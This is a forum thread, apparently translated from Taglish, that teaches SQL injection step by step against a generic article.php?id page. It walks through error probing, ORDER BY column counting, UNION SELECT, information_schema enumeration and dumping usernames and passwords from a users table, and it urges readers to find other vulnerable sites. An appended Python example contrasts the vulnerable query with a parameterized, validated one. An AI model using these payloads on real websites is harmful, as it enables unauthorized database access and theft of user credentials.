Closed SQL injection - in Taglish

Status
Not open for further replies.

zkrittlez_1337

NOTE: Just a reminder, learn to read. The quotation marks and the parentheses shown here are not part of what you type. Read carefully. Okay, let's start.
First, look for a vulnerable website.
Let's try this one.
EX:
article.php?id=54
How do you know whether a website is vulnerable to SQL injection?
Put ( ' ) at the end. (The parentheses are not included.)
So the result is:
article.php?id=54'
Hit [Enter], then something like this will appear:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Okay, the website can be used for our SQLi test.
Next, find the tables of our target website.
Delete the ( ' ) and replace it with "order by " (The parentheses are not included.)
then put ( 10-- ) at the end. (The parentheses are not included.)
Like this:
article.php?id=54 order by 10--
article.php?id=54 order by 20--
article.php?id=54 order by 30--
When ' 30 ' in ' order clause' appears, keep lowering the number until the "order clause" disappears.
So the correct tables count is 24--
order by 24--
Next, change "order by " to "union select" and put a ( - ) (The parentheses are not included.) before the =58
Like this
EXAMINE IT CAREFULLY.
For example, like this.
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Hit [Enter]. You will see something like this:
3
13,3 11 117
The number in BOLD is where you put " @@version "
Like this:
article.php?id=-54 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Hit [Enter] and something like "5.1.46-log " will appear.
NOTE:
Always remember: if it is lower than 5.0.0 log, for example 4.45.0- log, MOVE ON TO ANOTHER WEBSITE. THAT VERSION OF THE SITE WON'T WORK BECAUSE IT HAS NO TABLE SCHEMA.
Next, replace "@@version " with " group_concat (table_name) ", then at the end, after 24--, remove the ( -- ) and replace it with this:
from information_schema.tables where table_schema=database()--
It will look like this:
article.php?id=-54 union select 1,2,group_concat (table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables where table_schema=database()--
You will see something like this:
cont_lic_lu,content,content_types,countries,documents,fact_page_lu,fastfacts,hpitems,hpslides,itemtypes,languages,lic_holder_lu,lic_partner_lu,licences,links,locations,newsitems,operators,pages,pictures,sections,slides,slideshows, #users
What appears depends on the website. The target table is users. Then replace "group_concat " with "group_concat (column_name)", delete the end part starting at "from ", and replace it with
"from information_schema.columns where table_schema=database ()-- "
It will look like this:
article.php?id=-54 union select 1,2,group_concat (column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database()--
Then finally, find the username and password. If you still remember, #users is our target table; that is where the password and username will come from.
Here it is:
Replace (column_name ) with (username,0x3a,password ), then DELETE the end part after FROM, leaving only the FROM, and put our target table at the end, like this:
article.php?id=-54 union select 1,2,group_concat (username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from users--
Put ( -- ) after USERS at the end.

Notes, Warnings & Disclaimer: For Education Purposes, Do It At Your Own Risk!
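
The requests in the post above only work when the page pastes the id parameter straight into its SQL text. The following is an added example, not part of the original post, that puts that pattern beside a validated, parameterized lookup; sqlite3 stands in for the MySQL backend, and the table, function names and sample row are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 is a stand-in for the site's MySQL server.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO articles VALUES (54, 'Hello', 'Sample article body');
    """)
    return db

def get_article_vulnerable(db, id_param):
    # The pattern behind article.php?id=...: the raw parameter is concatenated
    # into the statement, so a quote, ORDER BY or UNION becomes part of the SQL.
    sql = "SELECT id, title, body FROM articles WHERE id = " + id_param
    return db.execute(sql).fetchall()

def get_article_hardened(db, id_param):
    # 1) Validate: the id must be a plain ASCII decimal integer.
    if not (id_param.isascii() and id_param.isdigit()):
        raise ValueError("id must be a positive integer")
    # 2) Bind: the value is passed separately and is never parsed as SQL.
    sql = "SELECT id, title, body FROM articles WHERE id = ?"
    return db.execute(sql, (int(id_param),)).fetchall()

def probe(func, db, id_param):
    # What a client would observe: rows, a leaked SQL error, or a clean rejection.
    try:
        return ("rows", func(db, id_param))
    except sqlite3.OperationalError as exc:
        return ("sql-error", str(exc))
    except ValueError as exc:
        return ("rejected", str(exc))

# Inputs taken from the post, with the column count reduced to this table's three.
SAMPLES = ["54", "54'", "54 order by 30--", "-54 union select 1,2,3--"]

if __name__ == "__main__":
    db = make_db()
    for value in SAMPLES:
        print(repr(value))
        print("  vulnerable:", probe(get_article_vulnerable, db, value))
        print("  hardened:  ", probe(get_article_hardened, db, value))
```

The hardened lookup also stops echoing database error text to the client, which is the signal the first step of the post relies on.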
 